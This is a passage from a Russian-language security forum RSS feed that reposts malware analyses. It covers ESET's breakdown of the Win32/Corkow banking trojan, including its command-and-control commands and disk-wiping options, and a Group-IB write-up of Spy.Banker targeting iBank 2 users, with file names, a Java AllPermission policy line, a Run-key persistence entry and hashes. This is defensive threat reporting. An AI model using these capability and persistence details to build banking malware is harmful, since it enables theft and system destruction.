Основной модуль Win32/Corkow отвечает за извлечение других своих модулей и внедрение их в соответствующие процессы, а также работу с C&amp;C-сервером. Вредоносный код содержит список URL-адресов, с которыми он пытается связаться. Начальный HTTP-запрос, который отправляется на сервер, содержит основную информацию о системе, версии определенных модулей и идентификатор бота Bot ID. На этом же этапе выбирается ключ для шифрования последующих сообщений с сервером, который основан на доменном имени C&amp;C и Bot ID. Затем сервер отвечает с использованием одной или нескольких команд. Ниже перечислены такие команды.

    Перезагрузить систему.
    Загрузить и выполнить исполняемый файл или DLL.
    Обновить бот.
    Скачать файл конфигурации для отдельных модулей.
    Уничтожить произвольный файл на диске (перезаписывая его произвольными данными).
    Удалить себя из системы (с возможностью выведения системы из строя, т. е. нарушив ее работу).


Последние две команды указывают на то, что помимо кражи данных, Win32/Corkow может вызвать серьезные повреждения в ОС. Когда сервер посылает боту команду на удаление себя из системы, он может передать специальный параметр, который укажет боту, что в системе нужно удалить критический системный файл и перезаписать MBR или NTFS MFT произвольными данными. После таких операций система становится незагружаемой.

Core DLL также содержит возможности по захвату скриншотов рабочего стола, блокированию запуска определенных приложений и перечисление установленных в системе смарт-карт. Политика блокирования запуска приложений определяется конфигурацией бота. Вредоносный код в бесконечном цикле выполняет перечисление запущенных в системе процессов через CreateToolhelp32Snapshot, а затем пытается завершить процессы, указанные в конфигурации. Подобное завершение процессов происходит из пользовательского режима, поэтому шансы на успешное завершение ограничены. Такая практика, вероятно, используется вредоносным кодом для предотвращения запуска банковских приложений пользователем, например, с целью проверки баланса своего счета.

В отличие от других, более сложных троянских программ, Corkow не умеет взаимодействовать со смарт-картами, а только перечисляет их. Интересно, что для получения информации о смарт-картах вредоносный код не использует Windows API, а вместо этого перечисляет физические устройства карт (используя для этого SetupDi API), далее осуществляя поиск заданных имен устройств.


<a rel="nofollow" href="http://habrahabr.ru/company/eset/blog/214197/">Блог ESET NOD32</a>

------------
]]>
        </description>
    </item>
    <item>
        <title>Spy.Banker атакует клиентов «iBank 2»</title>
        <link>https://chklst.ru/discussion/345/spy-banker-atakuet-klientov-ibank-2</link>
        <pubDate>Sat, 29 Jun 2013 09:37:48 +0000</pubDate>
        <category>Вирусы &amp; Антивирусы</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">345@/discussions</guid>
        <description><![CDATA[<a rel="nofollow" href="http://www.xakep.ru/post/60615/default.asp"><b><span style="font-size: medium;">В начале 2013 года в лабораторию </span> компьютерной криминалистики и исследования вредоносного кода</b></a> компании <b>Group-IB</b> поступил на анализ образ НЖМД по типичному инциденту – хищение крупной суммы у юридического лица через систему дистанционного банковского обслуживания. Результатами анализа зловреда поделится Трифонов Виталий, ведущий специалист по исследованию вредоносного кода Group-IB.
.....
При детальном анализе файловой системы был выявлен подозрительный каталог \Documents and Settings\&lt;Имя пользователя&gt;\Application Data\BIFIT_A.

В данном каталоге зарегистрированы файлы со следующими именами: «agent.exe», «all.policy», «bifit_a.cfg», «bifit_agent.jar», «javassist.jar». На момент исследования данные файлы ничем не детектировались, но уже с первого взгляда понятно, что они точно причастны к инциденту, что и подтвердилось данными из главной файловой таблицы (MFT).

    «all.policy» представляет собой обычный текстовый файл с содержимым «grant { permission java.security.AllPermission; };»
    «javassist.jar» – jar файл одноименной библиотеки – фреймворка для модификации или генерации байт-кода JAVA.
    «bifit_a.cfg» – название данного файла говорит само за себя, конфигурационный файл исследуемого зловреда, а содержимое его пока зашифровано.
.....
новый вариант <b>Spy.Banker</b> обнаружен на техническом форуме eset (forum.esetnod32.ru) в разделе <a rel="nofollow" href="http://forum.esetnod32.ru/forum6/">обнаружение вредоносного кода</a>.

<pre xml:lang="txt">Полное имя                  C:\USERS\USER\APPDATA\ROAMING\IBANK2\AGENT.EXE
Имя файла                   AGENT.EXE
Тек. статус                 ВИРУС ПРОВЕРЕННЫЙ в автозапуске 
                            
Статус                      ВИРУС 
Сигнатура                   Win32/Spy.Banker.ZNX [глубина совпадения 64(64), необх. минимум 8, максимум 64]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске 
File_Id                     51C2CCB4D2000
Linker                      10.0
Размер                      850264 байт
Создан                      21.06.2013 в 10:34:26
Изменен                     21.06.2013 в 10:34:26
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано IdentityMine Inc
                            
Оригинальное имя            a
Версия файла                1.0.0.1
Описание                    TODO: &lt;Описание файла&gt;
Производитель               TODO: &lt;Название компании&gt;
                            
Доп. информация             на момент обновления списка
SHA1                        899E37EE56147A82B369A9D76E2405CB40C2CCA8
MD5                         7A2B7A536D8019E5DE658199E5C2F55F
                            
Ссылки на объект            
Ссылка                      HKEY_USERS\S-1-5-21-1540010175-3909366378-4166182032-1000\Software\Microsoft\Windows\CurrentVersion\Run\bifit_agent
bifit_agent                 C:\Users\User\AppData\Roaming\iBank2\agent.exe
</pre>                            

при этом agent.exe имеет цифровую подпись IdentityMine Inc]]>
        </description>
    </item>
   </channel>
</rss>
